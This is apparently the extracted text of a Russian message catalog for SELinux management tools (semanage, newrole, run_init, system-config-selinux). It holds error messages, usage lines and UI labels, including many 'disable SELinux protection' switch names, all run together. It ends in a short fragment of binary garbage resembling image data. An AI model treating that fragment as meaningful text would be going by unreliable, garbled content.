Не удалось отправить транзакцию semanageНевозможно создать пользователя SELinux для %sНевозможно создать ключ для %sНевозможно создать ключ для %s/%sНе удалось создать адрес для %sНевозможно создать контекст для %sНевозможно создать контекст %s/%sНевозможно создать контекст файла для %sНе удалось создать интерфейс для %sНевозможно создать ключ для %sНевозможно создать сопоставление входа для %sНевозможно создать порт для %s/%sНе удалось создать дескриптор semanageНевозможно удалить пользователя SELinux %sНе удалось удалить addr %sНевозможно удалить переключатель %sНевозможно удалить контекст файла для %sНевозможно удалить интерфейс %sНевозможно удалить сопоставление входа для %sНевозможно удалить порт %s/%sНе удаётся удалить контекст файла для %sНевозможно удалить порт %sНе удалось определить строгий режим.
Невозможно установить соединение semanageНевозможно извлечь ключ для %sНе удалось получить список модулей SELinuxНевозможно выполнить перечисление пользователей SELinuxНе удалось получить список addrНевозможно выполнить перечисление переключателейНевозможно выполнить перечисление контекстов файловНевозможно выполнить перечисление интерфейсовНевозможно отобразить контекст локальных файловНевозможно выполнить перечисление сопоставлений входаНевозможно выполнить перечисление портовНевозможно выполнить перечисление ролей пользователя %sНе удалось получить список контекстов файловНе удалось получить список портовНевозможно изменить SELinux пользователя %sНе удалось изменить addr %sНевозможно изменить переключатель %sНевозможно изменить контекст файла для %sНевозможно изменить интерфейс %sНевозможно изменить сопоставление входа для %sНевозможно изменить порт %s/%sНевозможно открыть файл %s
Не удалось запросить addr %sНевозможно запросить контекст файла %sНевозможно запросить контекст файла для %sНевозможно запросить интерфейс %sНевозможно запросить порт %s/%sНевозможно запросить seuser для %sНевозможно запросить пользователя %sНе удалось удалить разрешающий домен %s (ошибка удаления)Невозможно задать уровень MLS для %sНевозможно задать диапазон MLS для %sНевозможно задать пользователя SELinux для %sНе удалось задать активное значение переключателя %sНе удалось задать контекст addr для %sНевозможно задать контекст исполнения для %s.
Невозможно задать контекст файла для %sНевозможно задать контекст интерфейса для %sНе удалось задать маску %sНевозможно задать контекст сообщения для %sНе удалось задать поля mls в контексте адреса для %sНевозможно задать поля msl в контексте файла для %sНе удалось задать поля mls в контексте интерфейса для %sНевозможно задать поля mls в контексте порта для %s/%sНевозможно задать имя для %sНе удалось задать разрешающий домен %s (ошибка установки модуля)Невозможно задать контекст порта для %s/%sНе удалось задать роль в контексте адреса для %sНевозможно задать роль в контексте файла для %sНе удалось задать роль в контексте интерфейса для %sНевозможно задать роль в контексте порта для %s/%sНе удалось задать тип в контексте адреса для %sНевозможно задать тип в контексте файла для %sНе удалось задать тип в контексте интерфейса для %s.Невозможно задать тип в контексте порта для %s/%sНе удалось задать пользователя в контексте адреса для %sНевозможно задать пользователя в контексте файла для %sНе удалось задать пользователя в контексте интерфейса для %sНевозможно задать пользователя в контексте порта для %s/%sНевозможно начать semanage транзакциюНе удалось проверить активный статус MLSНевозможно получить тип по умолчанию.
Создавать и обрабатывать временные файлы в каталоге /tmpCronТекущий строгий режимПроизвольныйСистемная служба DBUSБазы данныхУдалить %sУдалить контекст файлаУдалить сетевой портУдалить соответствие пользователя SELinuxУдалить пользователяОписаниеВыключить аудитОтключить защиту SELinux для Cluster Server Отключить защиту SELinux·для EvolutionОтключить защиту SELinux для Hal Отключить защиту SELinux для NIS Password Daemon Отключить защиту SELinux для NIS Transfer Daemon Отключить защиту SELinux для NetworkManagerОтключить защиту SELinux для Thunderbird Отключить защиту SELinux для acctОтключить защиту SELinux для amanda Отключить защиту SELinux для amavis Отключить защиту SELinux для службы apmd Отключить защиту SELinux для arpwatch Отключить защиту SELinux для auditd Отключить защиту SELinux для automount Отключить защиту SELinux для avahi Отключить защиту SELinux для bluetooth Отключить защиту SELinux для canna Отключить защиту SELinux для cardmgr Отключить защиту SELinux для ciped Отключить защиту SELinux для clamd Отключить защиту SELinux для clamscan Отключить защиту SELinux для clvmd Отключить защиту SELinux для comsat Отключить защиту SELinux для courier Отключить защиту SELinux для cpucontrol Отключить защиту SELinux для cpuspeed Отключить защиту SELinux для crond Отключить защиту SELinux для cups hplip Отключить защиту·SELinux·для сервера cupsdОтключить защиту SELinux для cupsdОтключить защиту SELinux для cupsd_lpd Отключить защиту SELinux для cvs Отключить защиту SELinux для cyrus Отключить защиту SELinux для dbskkd Отключить защиту SELinux для dbusd Отключить защиту SELinux для dccd Отключить защиту SELinux для dccifd Отключить защиту SELinux для dccmОтключить защиту SELinux для ddt Отключить защиту SELinux для devfsdОтключить защиту SELinux для dhcpcОтключить защиту SELinux для dhcpdОтключить защиту SELinux для dictdОтключить защиту SELinux для distccd Отключить защиту SELinux для dmesg Отключить защиту SELinux для dnsmasq Отключить защиту SELinux для dovecot Отключить защиту SELinux для entropyd Отключить защиту SELinux для fetchmail Отключить защиту SELinux для fingerd Отключить защиту SELinux для freshclam Отключить защиту SELinux для fsdaemon Отключить защиту SELinux для games Отключить защиту SELinux для gpm Отключить защиту SELinux для gss Отключить защиту SELinux для hostname Отключить защиту SELinux для hotplug Отключить защиту SELinux для howl Отключить защиту SELinux для http suexec Отключить защиту SELinux для httpd rotatelogs Отключить защиту SELinux для hwclock Отключить защиту SELinux для службы i18nОтключить защиту SELinux для imazesrvОтключить защиту SELinux для дочерних процессов inetdОтключить защиту SELinux для inetdОтключить защиту SELinux для inndОтключить защиту SELinux для iptablesОтключить защиту SELinux для ircdОтключить защиту SELinux для irqbalanceОтключить защиту SELinux для iscsiОтключить защиту SELinux для jabberdОтключить защиту SELinux для kadmindОтключить защиту SELinux для klogdОтключить защиту SELinux для krb5kdcОтключить защиту SELinux для процессов ktalkОтключить защиту SELinux для kudzuОтключить защиту SELinux для locateОтключить защиту SELinux для lpdОтключить защиту SELinux для lrrdОтключить защиту SELinux для lvmОтключить защиту SELinux для mailmanОтключить защиту SELinux для mdadmОтключить защиту SELinux для monopdОтключить защиту SELinux для mrtgОтключить защиту SELinux для mysqldОтключить защиту SELinux для nagiosОтключить защиту SELinux для namedОтключить защиту SELinux для nessusdОтключить защиту SELinux для nfsdОтключить защиту SELinux для nmbdОтключить защиту SELinux для nrpeОтключить защиту SELinux для nscdОтключить защиту SELinux для nsdОтключить защиту SELinux для ntpd Отключить защиту SELinux для oddjob Отключить защиту SELinux для oddjob_mkhomedir Отключить защиту SELinux для openvpn Отключить защиту SELinux для pamОтключить защиту SELinux для pegasus Отключить защиту SELinux для perdition Отключить защиту SELinux для portmap Отключить защиту SELinux для portslave Отключить защиту SELinux для postfix Отключить защиту SELinux для postgresql Отключить защиту SELinux для pptpОтключить защиту SELinux для prelinkОтключить защиту SELinux для privoxyОтключить защиту SELinux для ptalОтключить защиту SELinux для pxeОтключить защиту SELinux для pyzordОтключить защиту SELinux для quotaОтключить защиту SELinux для radiusdОтключить защиту SELinux для radvd Отключить защиту SELinux для rdisc Отключить защиту SELinux для readahead Отключить защиту SELinux для restorecondОтключить защиту SELinux для rhgb Отключить защиту SELinux для ricci Отключить защиту SELinux для ricci_modclusterd Отключить защиту SELinux для rlogind Отключить защиту SELinux для rpcd Отключить защиту SELinux для rshd Отключить защиту SELinux для rsync Отключить защиту SELinux для saslauthd Отключить защиту SELinux для scannerdaemon Отключить защиту SELinux для sendmailОтключить защиту SELinux для setransОтключить защиту SELinux для setroubleshootОтключить защиту SELinux для slapd Отключить защиту SELinux для slrnpull Отключить защиту SELinux для smbd Отключить защиту SELinux для snmpd Отключить защиту SELinux для snort Отключить защиту SELinux для sound Отключить защиту SELinux для soundd Отключить защиту SELinux для spamd Отключить защиту SELinux для speedmgmt Отключить защиту SELinux для squidОтключить защиту SELinux для ssh Отключить защиту SELinux для stunnel Отключить защиту SELinux для swatОтключить защиту SELinux для sxid Отключить защиту SELinux для syslogd Отключить защиту SELinux для системы заданий cron jobs Отключить защиту SELinux для tcp Отключить защиту SELinux для telnet Отключить защиту SELinux для tftpd Отключить защиту SELinux для веб-браузеров Отключить защиту SELinux для transproxy Отключить защиту SELinux для udev Отключить защиту SELinux для uml Отключить защиту SELinux для updfstab Отключить защиту SELinux для uptimed Отключить защиту SELinux для uucpdОтключить защиту SELinux для vmwareОтключить защиту SELinux для watchdog Отключить защиту SELinux для winbind Отключить защиту SELinux для xdm Отключить защиту SELinux для управления xen Отключить защиту SELinux для xenОтключить защиту SELinux для xfsОтключить защиту SELinux для ypbind Отключить защиту SELinux для ypserv ВыключеноВыключено
Разрешающий
Строгий
Не разрешать процессам загружать модули ядраНе разрешать процессам изменять политику SELinux ядраНе разрешать изменение на sysadm_t, sudo и suНе выполнять аудит неисправных компонентов, которые не представляют угрозу безопасностиИзменить сетевой портВключить аудитВключить или выключить дополнительные правила аудита, которые обычно не отражаются в журналах.СтрогийУкажите полный путь к исполняемому компоненту, к которому будут применены ограниченияУкажите полный путь к сценарию init, используемому для запуска ограничиваемого приложения.Введите уникальное имя для ограничиваемой роли приложения/ пользователя.Ошибка выделения памяти.
Ошибка выделения argv0 оболочки.
Ошибка смены uid, аварийное завершение.
Ошибка соединения с системой аудита.
Ошибка сброса возможности SETUID, аварийное завершение.
Ошибка сброса возможностей, аварийное завершение.
Ошибка освобождения возможностей
Ошибка инициализации, аварийное завершение.
Ошибка сброса KEEPCAPS, аварийное завершение.
Ошибка отправки сообщения аудита.
Ошибка установки KEEPCAPS, аварийное завершение.
Ошибка настройки возможностей, аварийное завершение
Ошибка!  Невозможно открыть %s.
Ошибка!  Оболочка не верна.
Ошибка: указано несколько уровней
Ошибка: указано несколько ролей
Ошибка: указано несколько типов
Ошибка: Вы не можете изменять уровень в небезопасном терминале
Исполняемый компонентСуществующие роли пользователейСуществующий _пользовательОшибка корректного закрытия tty
Определение
файловФайл
ТипФайл контекстаПрисвоение меток файламСпецификация файлаТип файлаКонтекст файла для %s определен в политике и не может быть удаленКонтекст файла для %s не определенФильтрGPLИгрыГенерировать модуль новой политикиГруппыСлужба HTTPDСценарий initВзаимодействует с терминаломИнтерфейс %s определен в политике и не может быть удаленИнтерфейс %s yt определенФайл интерфейсаДиспетчер Интернет-служб (inetd)initd запускается службой xinetdНеверная спецификация файлаKerberosРазметкаLinux-группа %s не существуетLinux-пользователь %s не существуетСписокЗагрузить модуль политикиЗагрузить модуль политикиБлокирование...Логин
ИмяТребуется авторизация «%s»Имя входаСопоставление входа для %s определено в политике и не может быть удаленоСопоставление входа для %s не определеноMCS УровеньMCS ДиапазонMLSMLS/Диапазон
MLS/MCSMLS/MCS
УровеньДиапазон MLS/MCSЗащита памятиМинимальная роль пользователя терминалаМинимальная роль пользователя X WindowИзменить %sИзменить контекст файлаИзменить сопоставление пользователя SELinux пользователя %sИзменить пользователяИзменить существующую запись авторизации пользователя.Модуль %s.pp уже загружен в текущую политику.
Продолжить?Имя модуляМонтированиеNFSNISИмяСлужба имёнКонфигурация сетиСетевой портНет контекста в файле %s
Требуется адрес узлаНеобходимо значение портаФункциональность еще не реализованаОшибка параметров %s Недостаточно памяти!
Пароль:РазрешающийPolgenКаталог политикиМодуль политикиПортПорт %s/%s уже определенПорт %s/%s определен в политике и не может быть удаленПорт %s/%s не определенНомер ПортаНеобходимо значение портаНеверный номер порта "%s". 0 < номер порта < 65536 Номера портов должны лежать в диапазоне от 1 до %d ПрефиксПечатьДомен процессаПротоколПротоколНеобходимо задание tcp или udp протоколаRed Hat 2007Переразметка при следующей загрузке.Удалить загружаемый модуль политикиТребуется как минимум одна категорияНеобходим префикс или рольНеобходим префикс, роль, уровень или диапазонНеобходим setypeНеобходим setype или serangeНеобходим setyp, serange или seuserНеобходим seuser или serangeВосстановить исходное значение параметраРольРоль администратора rootЗапустить мастер блокировки логических переменныхсервер авторизации SASLSELinux
ПользовательАдминистрирование SELinuxИнтерфейс SELinuxСредство создания политики SELinuxSELinux Порт
ТипТип порта SELinuxРоли SELinuxЗащита служб SELinuxТип SELinuxТребуется SELinux TypeПользователь SELinuxПереключатель SELinuxКонтекст файла SELinuxПолитика SELinux не поддерживает управление или хранилище недоступно.SELinux пользователь %s определен в политике и не может быть удаленSELinux пользователь %s не определенНеобходим SELinux пользователь «%s»SSHSambaВыбрать объект управленияВыберите портыВыберите роль администратора root, если этот пользователь также администрирует систему в режиме root. При этом пользователь не сможет авторизоваться в системе напрямую.Выберите каталог, в котором будут генерироваться файлы политикиВыберите каталоги, которые будут принадлежать ограничиваемым приложениямВыберите исполняемый файл для применения ограничений.Выберите файлы, которые ограничиваемое приложение будет создавать или записыватьВыберите, если вы хотите выполнить переразметку всей файловой системы при следующей загрузке. Процесс переразметки может быть длительным в зависимости о размера файловой системы. При изменении типа политики также будет необходима переразметка.Выберите сценарий init для применения ограничений.Выберите домены, которыми должен управлять этот пользователь.Выберите роли пользователей, которые следует перенести в домены приложений.SELinux
Тип ФайлаТранзакция semanage уже выполняетсяТранзакция semanage не выполняетсяОтправка audit сообщений Отправляет сообщение по эл.почтеСценарий настройкиИзвините, -l может быть использована с поддержкой SELinux MLS.
Извините. newrole может быть использована только для ядра с SELinux.
Извините, run_init может быть использовано только для ядра с SELinux.
Защита от cпамаSquidСтандартная служба InitСтандартные службы инициализации запускаются при загрузке с помощью сценариев init, которые обычно расположены в /etc/rc.d/init.dСтатусСтрогий режим по умолчаниюТип политики по умолчанию:Этот пользователь может авторизоваться с помощью X или терминала. Изначально для пользователя не настроены setuid, sudo, su и сетевое окружение.Пользователь сможет авторизоваться только удаленно или в терминале. Изначально для пользователя не настроены setuid, sudo, su и сетевое окружение.Для активации пакета политики выполните:Переключение между пользовательскими и всеми логическими значениямиПереключение между пользовательскими и всеми портамиПереключение между всеми и произвольными контекстами файловПеренести пользователя staff в домен веб-браузераПеренести пользователя sysadm в домен веб-браузераПеренести пользователя user в домен веб-браузераПеренести пользователя xguest в домен веб-браузераТип %s_t уже определен в текущей политике.
Продолжить?Файл принуждения типаТребуется задание типаИспользование: run_init <сценарий> <аргументы ...>
  где <сценарий> &mdash; имя запускаемого сценария инициализации,
       <аргументы ...>  &mdash; передаваемые сценарию аргументы.Типам пользователей автоматически присваивается тип tmpНевозможно выделить память для new_contextНевозможно очистить окружение
Невозможно получить набор пустых сигналов
Невозможно восстановить окружение, аварийное завершение
Невозможно восстановить метку tty...
Невозможно получить обработчик SIGHUP
Универсальный туннель SSLПротокол отсутствует или неизвестенНезарезервированные порты (>1024)Использование %s -LИспользование %s -L -l пользовательИспользование %s -d Файл ...Использование %s -l -d пользователь ...Использование %s -l КАТЕГОРИЯ пользователь ...Использование %s -l [[+|-]КАТЕГОРИЯ],...]q пользователь ...Использование %s КАТЕГОРИЯ Файл ...Использование %s [[+|-]КАТЕГОРИЯ],...]q Файл ...Используйте -- чтобы указать завершение списка параметров. На примерПользовательское приложениеПользовательское приложение -- любое приложение, запущенное пользователем, к которому вы хотите применить ограничения.Сопоставление пользователейПривилегии пользователейРоль пользователяПользователь с полностью настроенным сетевым окружением, приложения без setuid, без su могут выполнять доступ sudo к ролям администрирования root.Пользователь с полностью настроенным сетевым окружением, приложения без setuid, без su, без sudo.Используется Pam для аутентификацииИспользуется dbusИспользуются nsswitch или getpw* вызовыПроверка имениВерсияВнимание!  Не удалось получить информацию о tty.
Внимание! Невозможно восстановить контекст для %s
Веб-приложение/ сценарий (CGI)Web ПриложенияВеб-приложения/ сценарии CGI, запускаемые веб-сервером ApacheЗаписывает сообщения syslog	XENXServerНеобходимо добавить как минимум одну роль для %sНеобходимо указать исполняемый компонентНеобходимо ввести имя процесса/ пользователя с ограничениямиДля ограничиваемого процесса необходимо задать исполняемый путьНеобходимо указать пользователяНеобходимо указать значение: %s_Удалить_Свойствовсевсе файлы
обычный файл
каталог
символьное устройство
блочное устройство
сокет
символьная ссылка
канал
сбой проверки подлинности.
не удается найти корректную запись в файле passwd.
chcat -- -CompanyConfidential /docs/businessplan.odtchcat -l +CompanyConfidential juserошибка чтения конфигурации службы PAM.
сбой построения нового диапазона с уровнем %s
сбой преобразования нового контекста в строку
сбой запуска оболочки
не удалось получить сведения учётной записи
сбой получения нового контекста.
сбой получения старого_контекста.
сбой инициализации PAM
сбой установки PAM_TTY
сбой задания нового диапазона %s
сбой задания новой роли %s
сбой задания нового типа %s
getpass не может открыть /dev/tty
глобальноеlabel37label38label39label41label42label44label50label59newrole:  %s:  ошибка в строке %lu.
newrole: сбой выполнения fork: %snewrole: неверный пароль %s
newrole: переполнение хеш-таблицы настроек имен служб
выкл.вкл.pppdrsyncrun_init: неверный пароль для %s
system-config-selinuxпереводтипнеизвестныйиспользование:  %s [-qi]
use_syslog должен содержать логическое значение
y~or5J={Eeu磝QkᯘG{?+]ן?wM3X^歌>{7پK>on\jyR g/=fOroNVv~Y+NGuÝHWyw[eQʨSb>>}Gmx[o[<{Ϯ_qF vMIENDB`